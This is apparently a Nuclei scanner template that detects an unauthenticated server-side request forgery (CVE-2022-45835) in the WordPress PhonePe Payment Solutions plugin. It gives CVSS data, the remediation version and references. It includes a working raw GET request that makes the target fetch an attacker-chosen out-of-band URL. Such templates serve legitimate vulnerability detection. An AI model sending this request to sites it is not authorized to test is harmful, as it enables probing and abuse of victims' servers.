id: CVE-2022-45835 info: name: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery author: theamanrawat severity: medium description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf - https://wordpress.org/plugins/phonepe-payment-solutions/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45835 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-918 cve-id: CVE-2022-45835 metadata: max-request: 1 verified: true tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe http: - raw: - | GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body words: - "cURL Test for PhonePe" - type: status status: - 200 # Enhanced by cs on 2023/04/17